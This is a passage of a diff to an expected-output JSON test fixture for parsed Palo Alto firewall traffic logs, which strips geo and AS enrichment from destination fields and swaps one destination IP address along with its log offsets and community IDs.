         "network.community_id": "1:2v1FAVArMu9Fw0rZTZH/beAYGjs=",
@@ -5926,17 +5592,7 @@
         "client.port": 47752,
         "client.user.name": "crusher",
         "destination.address": "65.55.223.31",
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Washington",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.7095,
-        "destination.geo.location.lon": -78.1539,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "65.55.223.31",
         "destination.packets": 0,
         "destination.port": 40043,
@@ -5962,7 +5618,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 21451,
+        "log.offset": 21407,
         "network.application": "skype-probe",
         "network.bytes": 186,
         "network.community_id": "1:2fa34ze5XsRR97Shg/2DWoWt57c=",
@@ -6027,19 +5683,15 @@
         "client.packets": 1,
         "client.port": 59297,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -6052,7 +5704,7 @@
         "event.end": "2012-04-10T04:39:52.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:52.000-02:00",
         "event.timezone": "-02:00",
@@ -6064,10 +5716,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 21817,
+        "log.offset": 21773,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:Sa+u435/AIAAeEelFduJmiGLOv0=",
+        "network.community_id": "1:rIUUZipsjZe9D+20GocGgeotUX8=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -6099,14 +5751,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -6130,14 +5782,7 @@
         "client.port": 52537,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -6163,7 +5808,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 22181,
+        "log.offset": 22135,
         "network.application": "dns",
         "network.bytes": 82,
         "network.community_id": "1:Uym9anPFBcnC+VaX8dVhkzw/pgg=",
@@ -6229,14 +5874,7 @@
         "client.port": 53155,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -6262,7 +5900,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 22534,
+        "log.offset": 22488,
         "network.application": "dns",
         "network.bytes": 82,
         "network.community_id": "1:BWJpN5ucpEKzwxBd0yrkows1+X4=",
@@ -6328,14 +5966,7 @@
         "client.port": 59197,
         "client.user.name": "crusher",
         "destination.address": "62.211.68.12",
-        "destination.as.number": 3269,
-        "destination.as.organization.name": "Telecom Italia",
         "destination.bytes": 906,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 43.1479,
-        "destination.geo.location.lon": 12.1097,
         "destination.ip": "62.211.68.12",
         "destination.packets": 7,
         "destination.port": 80,
@@ -6361,7 +5992,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 22887,
+        "log.offset": 22841,
         "network.application": "web-browsing",
         "network.bytes": 1487,
         "network.community_id": "1:k2B753fAG7GMJoQhAbMrDsOfDxA=",
@@ -6427,14 +6058,7 @@
         "client.port": 56995,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 163,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 1,
         "destination.port": 53,
@@ -6460,7 +6084,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 23264,
+        "log.offset": 23218,
         "network.application": "dns",
         "network.bytes": 251,
         "network.community_id": "1:PkU1rpfXiwvVRig4MJMcDvEUEas=",
@@ -6526,14 +6150,7 @@
         "client.port": 59069,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -6559,7 +6176,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 23618,
+        "log.offset": 23572,
         "network.application": "dns",
         "network.bytes": 76,
         "network.community_id": "1:BYZjFq0Mi2hPewpUDaO1jY2UNnA=",
@@ -6625,14 +6242,7 @@
         "client.port": 55697,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -6658,7 +6268,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 23971,
+        "log.offset": 23925,
         "network.application": "dns",
         "network.bytes": 76,
         "network.community_id": "1:l0WoNEsuwN4ml47IyB3IhM2NX6A=",
@@ -6723,19 +6333,15 @@
         "client.packets": 1,
         "client.port": 59295,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -6748,7 +6354,7 @@
         "event.end": "2012-04-10T04:39:51.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:51.000-02:00",
         "event.timezone": "-02:00",
@@ -6760,10 +6366,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 24324,
+        "log.offset": 24278,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:AEtFqIuwxZ9TQ3w9m74nOrboCXE=",
+        "network.community_id": "1:BV30Tkuh3C81MwjElomoGcaQISc=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -6795,14 +6401,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -6826,14 +6432,7 @@
         "client.port": 59196,
         "client.user.name": "crusher",
         "destination.address": "62.211.68.12",
-        "destination.as.number": 3269,
-        "destination.as.organization.name": "Telecom Italia",
         "destination.bytes": 922,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 43.1479,
-        "destination.geo.location.lon": 12.1097,
         "destination.ip": "62.211.68.12",
         "destination.packets": 7,
         "destination.port": 80,
@@ -6859,7 +6458,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 24688,
+        "log.offset": 24640,
         "network.application": "web-browsing",
         "network.bytes": 1500,
         "network.community_id": "1:t42FnU6e46qlRX0ij7ufkKPs3Co=",
@@ -6924,19 +6523,15 @@
         "client.packets": 1,
         "client.port": 59291,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -6949,7 +6544,7 @@
         "event.end": "2012-04-10T04:39:51.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:51.000-02:00",
         "event.timezone": "-02:00",
@@ -6961,10 +6556,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 25063,
+        "log.offset": 25015,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:AuQEAPptnfXLW8oL/ac3CM4Gnnw=",
+        "network.community_id": "1:xHSG5OWliVYrQrcpFpqQQ8rABOQ=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -6996,14 +6591,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -7027,14 +6622,7 @@
         "client.port": 52858,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -7060,7 +6648,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 25427,
+        "log.offset": 25377,
         "network.application": "dns",
         "network.bytes": 77,
         "network.community_id": "1:ZVsgbE2ux52iF80QIxJN36vdI1M=",
@@ -7126,14 +6714,7 @@
         "client.port": 61383,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -7159,7 +6740,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 25780,
+        "log.offset": 25730,
         "network.application": "dns",
         "network.bytes": 77,
         "network.community_id": "1:p68po3QtexuC2kor01hJgMDKiPM=",
@@ -7224,19 +6805,15 @@
         "client.packets": 1,
         "client.port": 59290,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -7249,7 +6826,7 @@
         "event.end": "2012-04-10T04:39:50.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:50.000-02:00",
         "event.timezone": "-02:00",
@@ -7261,10 +6838,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 26133,
+        "log.offset": 26083,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=",
+        "network.community_id": "1:xYos/Wgi+h9Q+dddrLHkE05fDcY=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -7296,14 +6873,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -7327,14 +6904,7 @@
         "client.port": 59195,
         "client.user.name": "crusher",
         "destination.address": "8.5.1.1",
-        "destination.as.number": 3356,
-        "destination.as.organization.name": "Level 3 Parent, LLC",
         "destination.bytes": 26786,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.5.1.1",
         "destination.packets": 22,
         "destination.port": 80,
@@ -7360,7 +6930,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 26497,
+        "log.offset": 26445,
         "network.application": "web-browsing",
         "network.bytes": 28096,
         "network.community_id": "1:J6pba/4Qby485gtIOBCJnQ0T04E=",
@@ -7426,14 +6996,7 @@
         "client.port": 49812,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -7459,7 +7022,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 26873,
+        "log.offset": 26821,
         "network.application": "dns",
         "network.bytes": 83,
         "network.community_id": "1:iSTXT01g3/K5eC8sEHIzTaFShsA=",
@@ -7525,14 +7088,7 @@
         "client.port": 50185,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -7558,7 +7114,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 27226,
+        "log.offset": 27174,
         "network.application": "dns",
         "network.bytes": 83,
         "network.community_id": "1:3UaggcKnXvkcjpVHqbTU3mCMT5E=",
@@ -7623,19 +7179,15 @@
         "client.packets": 1,
         "client.port": 59286,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -7648,7 +7200,7 @@
         "event.end": "2012-04-10T04:39:50.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:50.000-02:00",
         "event.timezone": "-02:00",
@@ -7660,10 +7212,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 27579,
+        "log.offset": 27527,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=",
+        "network.community_id": "1:rCE7GRimBj3QOL9WyI+CJq1w2hU=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -7695,14 +7247,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -7752,7 +7304,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 27943,
+        "log.offset": 27889,
         "network.application": "dns",
         "network.bytes": 244,
         "network.community_id": "1:aqHtUqeIwO72eo1M5ATE45cIze8=",
@@ -7818,17 +7370,7 @@
         "client.port": 59194,
         "client.user.name": "crusher",
         "destination.address": "212.48.10.58",
-        "destination.as.number": 8660,
-        "destination.as.organization.name": "Italiaonline S.p.A.",
         "destination.bytes": 9064,
-        "destination.geo.city_name": "Assago",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 45.4087,
-        "destination.geo.location.lon": 9.1225,
-        "destination.geo.region_iso_code": "IT-MI",
-        "destination.geo.region_name": "Milan",
         "destination.ip": "212.48.10.58",
         "destination.packets": 9,
         "destination.port": 80,
@@ -7854,7 +7396,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 28310,
+        "log.offset": 28256,
         "network.application": "web-browsing",
         "network.bytes": 10097,
         "network.community_id": "1:ZM81iQMHQAIwuZHdw5tm5lXF25A=",
@@ -7920,17 +7462,7 @@
         "client.port": 59192,
         "client.user.name": "crusher",
         "destination.address": "212.48.10.58",
-        "destination.as.number": 8660,
-        "destination.as.organization.name": "Italiaonline S.p.A.",
         "destination.bytes": 9124,
-        "destination.geo.city_name": "Assago",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IT",
-        "destination.geo.country_name": "Italy",
-        "destination.geo.location.lat": 45.4087,
-        "destination.geo.location.lon": 9.1225,
-        "destination.geo.region_iso_code": "IT-MI",
-        "destination.geo.region_name": "Milan",
         "destination.ip": "212.48.10.58",
         "destination.packets": 10,
         "destination.port": 80,
@@ -7956,7 +7488,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 28683,
+        "log.offset": 28629,
         "network.application": "web-browsing",
         "network.bytes": 10105,
         "network.community_id": "1:yYl3JBOjYyGDcmf0pDc+hxky9gU=",
@@ -8048,7 +7580,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 29056,
+        "log.offset": 29002,
         "network.application": "dns",
         "network.bytes": 214,
         "network.community_id": "1:VW3f2r1OUrbsOCF06MDfY/o+epU=",
@@ -8140,7 +7672,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 29423,
+        "log.offset": 29369,
         "network.application": "dns",
         "network.bytes": 170,
         "network.community_id": "1:yvOxIP48drmX6OmaQqFTRaGanko=",
@@ -8205,19 +7737,15 @@
         "client.packets": 1,
         "client.port": 59282,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -8230,7 +7758,7 @@
         "event.end": "2012-04-10T04:39:49.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
